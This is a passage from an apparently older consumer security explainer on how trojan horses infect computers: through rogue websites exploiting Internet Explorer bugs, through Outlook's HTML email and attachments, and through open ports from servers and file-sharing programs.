Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those d